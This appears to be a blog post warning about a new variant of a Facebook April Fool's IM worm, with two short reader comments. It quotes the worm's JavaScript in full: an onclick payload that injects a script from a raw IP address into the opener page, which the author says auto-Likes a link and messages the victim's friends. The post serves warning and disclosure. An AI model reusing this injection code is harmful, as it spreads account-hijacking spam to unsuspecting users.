new variant of Facebook April Fool’s IM worm

There’s a new variant of the Facebook April Fool’s worm going around. This one appears as an IM with the text “haha! hilarous http://fb.me/TzCxMrJW”; the page behind the URL shortener is http://apps.facebook.com/bullydown/ (taken down since I started writing this, see screenshot) which appears to be a Facebook video but actually loads some JavaScript using an onclick handler:

javascript:if(window.opener){ window.opener.document.body.appendChild(document.createElement(‘script’)).src=’http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous’; window.close(); }else{ document.body.appendChild(document.createElement(‘script’)).src=’http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous’; }

Facebook Bully Down wormWhatever it loads seems to Facebook Like the link http://winterweddingfavor.info/bullypal/ and then IM your friends. I got three messages in a short span of time. Not sure what’s required to send IMs through Facebook, might be it uses a fake login page to steal credentials like other variants.

 

Advertisements
Tagged ,

2 thoughts on “new variant of Facebook April Fool’s IM worm

  1. Jeremy says:

    One of my contacts who was compromised by this says that it didn’t ask for his Facebook credentials, so the mechanism by which it sends IMs must not need them.

  2. john doe says:

    HOW CAN WE REMOVE THIS.. IT’S IN MY “OTHER PAGES YOU LIKE” AND IT CAN’T BE REMOVE

Comments are closed.

%d bloggers like this: